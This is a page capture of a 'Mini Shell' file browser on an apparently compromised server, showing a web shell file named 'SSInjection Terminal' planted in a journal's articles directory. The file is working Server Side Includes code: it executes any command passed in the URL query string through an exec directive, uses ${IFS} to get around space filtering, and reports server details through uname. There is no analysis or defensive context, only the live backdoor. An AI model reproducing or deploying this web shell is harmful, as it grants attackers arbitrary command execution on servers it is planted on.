HOME


Mini Shell 1.0
DIR: /home/dhnidqcz/ojsdatamain/journals/1/articles/38/
Upload File :
Current File : /home/dhnidqcz/ojsdatamain/journals/1/articles/38/68939d0cd501b.shTmL
<title>SSInjection </title>
<body bgcolor="black">
<font color="lime" face="Inconsolata">
<!--#config errmsg="[Error in shell]"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<link href="https://fonts.googleapis.com/css?family=Inconsolata&display=swap" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<pre>               
    |\__/,|   (`\
    |o o  |__ _) SSInjection Terminal
  _.( T   )  `  / 
 ((_ `^--' /_<  \
 `` `-'(((/  (((/                                   
</pre>
<script language="javascript">
    function fex()
    {
        var uri = document.getElementById('command').value;
        var rep = uri.replace(/[ ]/g,'${IFS}');
        var res = encodeURI(uri);
        document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
    }
    </script>
    <script>
    document.onkeydown = keydown;
    function keydown(e) {
        if (!e) e = event;
        if (e.keyCode === 13) {
            var uri = document.getElementById('command').value;
            var rep = uri.replace(/[ ]/g,'${IFS}');
            var res = encodeURI(uri);
            document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
    
        }
    }
    </script>
    
    </head>
    <body>
    <font size=2>
        Server : <!--#exec cmd="{uname,-nr}" --><br>
        GMT date : <!--#echo var=DATE_GMT --><br>
        Local date : <!--#echo var=DATE_LOCAL --><br>
        Document URI :<!--#echo var=DOCUMENT_URI --><br>
        Last modified : <!--#echo var=LAST_MODIFIED --><br>
<br>
    <font size=2>Command : <input type=text size=20 id=command class="text" name="address1" style="max-width: 100%; max-height: 100%;"> <input type=button value=Execute onclick="fex();">
    <hr>
    Executed Command : </font><b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=100 rows=15>
<!--#exec cmd=$shl -->